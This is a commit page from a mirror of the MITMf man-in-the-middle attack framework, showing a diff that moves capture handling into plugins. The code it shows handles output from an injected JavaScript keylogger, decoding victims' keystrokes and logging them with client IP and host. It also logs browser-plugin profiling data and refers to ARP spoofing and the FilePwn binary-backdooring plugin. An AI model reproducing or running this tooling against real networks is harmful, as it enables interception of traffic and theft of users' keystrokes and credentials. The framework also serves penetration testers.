github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-07 05:22:15 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

plugins now handle their own output

Browse source
This commit is contained in:
byt3bl33d3r 2014-07-14 13:17:34 +02:00
parent 606e85be40
commit 1b6841f9c1
6 changed files with 47 additions and 56 deletions
Download patch file Download diff file Expand all files Collapse all files

2
plugins/ArpSpoof.py
View file

@ -36,7 +36,7 @@ class ArpSpoof(Plugin):
if self.options.log_level == 'debug':
self.debug = True
print "[*] %s plugin online" % self.name
print "[*] ARP Spoof plugin online"
if self.setup == True:
print '[*] Setting up ip_forward and iptables'
file = open('/proc/sys/net/ipv4/ip_forward', 'w')

18
plugins/BrowserProfiler.py
View file

@ -1,16 +1,32 @@
from plugins.plugin import Plugin
from plugins.Inject import Inject
from pprint import pformat
import logging
class BrowserProfiler(Inject, Plugin):
name = "Browser Profiler"
optname = "browserprofiler"
desc = "Attempts to enumerate all browser plugins of connected clients"
implements = ["handleResponse","handleHeader","connectionMade", "sendPostData"]
has_opts = False
def initialize(self,options):
Inject.initialize(self, options)
self.html_payload = self.get_payload()
print "[*] %s online" % self.name
print "[*] Browser Profiler online"
def post2dict(self, string):
dict = {}
for line in string.split('&'):
t = line.split('=')
dict[t[0]] = t[1]
return dict
def sendPostData(self, request):
#Handle the browserprofiler plugin output
if 'clientprfl' in request.uri:
out = pformat(self.post2dict(request.postData))
logging.warning("%s Browser Profilerer data:\n%s" % (request.client.getClientIP(), out))
def get_payload(self):
payload = """<script type="text/javascript">

4
plugins/FilePwn.py
View file

@ -16,7 +16,7 @@ from tempfile import mkstemp
try:
from configobj import ConfigObj
except:
sys.exit('[-] configobj not installed!')
sys.exit('[-] configobj library not installed!')
class FilePwn(Plugin):
name = "FilePwn"
@ -55,7 +55,7 @@ class FilePwn(Plugin):
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
self.zipblacklist = self.userConfig['ZIP']['blacklist']
print "[*] %s plugin online" % self.name
print "[*] FilePwn plugin online"
def binaryGrinder(self, binaryFile):
"""

26
plugins/jskeylogger.py
View file

@ -1,16 +1,40 @@
from plugins.plugin import Plugin
from plugins.Inject import Inject
import logging
class jskeylogger(Inject, Plugin):
name = "Javascript Keylogger"
optname = "jskeylogger"
desc = "Injects a javascript keylogger into clients webpages"
implements = ["handleResponse","handleHeader","connectionMade", "sendPostData"]
has_opts = False
def initialize(self,options):
Inject.initialize(self, options)
self.html_payload = self.msf_keylogger()
print "[*] %s plugin online" % self.name
print "[*] Javascript Keylogger plugin online"
def sendPostData(self, request):
#Handle the jskeylogger plugin output
if 'keylog' in request.uri:
keys = request.postData.split(",")
del keys[0]; del(keys[len(keys)-1])
nice = ''
for n in keys:
if n == '9':
nice += "<TAB>"
elif n == '8':
nice = nice.replace(nice[-1:], "")
elif n == '13':
nice = ''
else:
try:
nice += n.decode('hex')
except:
print "ERROR: unknown char " + n
logging.warning("%s [%s] Keys: %s" % (request.client.getClientIP(), request.headers['host'], nice))
def msf_keylogger(self):
#Stolen from the Metasploit module http_javascript_keylogger

16
plugins/test.py
View file

@ -1,16 +0,0 @@
from plugins.plugin import Plugin
#Uncomment to use
'''
class Test(Plugin):
name = "Test"
optname = "test"
has_opts = True
implements = ["handleResponse"]
def add_options(self,options):
options.add_argument("--testy",action="store_true",
help="This is a test option")
def initialize(self,options):
self.worked = options.test
def handleResponse(self,request,data):
print "http://" + request.client.getRequestHostname() + request.uri
'''

37
sslstrip/ServerConnection.py
View file

@ -23,7 +23,6 @@ from twisted.web.http import HTTPClient
from ResponseTampererFactory import ResponseTampererFactory
from URLMonitor import URLMonitor
from ProxyPlugins import ProxyPlugins
from pprint import pformat
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
@ -49,13 +48,6 @@ class ServerConnection(HTTPClient):
self.contentLength = None
self.shutdownComplete = False
def post2dict(self, string):
dict = {}
for line in string.split('&'):
t = line.split('=')
dict[t[0]] = t[1]
return dict
def getPostPrefix(self):
return "POST"
@ -73,33 +65,8 @@ class ServerConnection(HTTPClient):
self.endHeaders()
def sendPostData(self):
#Handle the browserprofiler plugin output
if 'clientprfl' in self.uri:
out = pformat(self.post2dict(self.postData))
logging.warning("%s Browser Profilerer data:\n%s" % (self.client.getClientIP(), out))
#Handle the jskeylogger plugin output
elif 'keylog' in self.uri:
keys = self.postData.split(",")
del keys[0]; del(keys[len(keys)-1])
nice = ''
for n in keys:
if n == '9':
nice += "<TAB>"
elif n == '8':
nice = nice.replace(nice[-1:], "")
elif n == '13':
nice = ''
else:
try:
nice += n.decode('hex')
except:
print "ERROR: unknown char " + n
logging.warning("%s [%s] Keys: %s" % (self.client.getClientIP(), self.headers['host'], nice))
else:
self.plugins.hook()
if ('clientprfl' or 'keylog') not in self.uri:
logging.warning("%s Data (%s):\n%s" % (self.getPostPrefix(),self.headers['host'],self.postData))
self.transport.write(self.postData)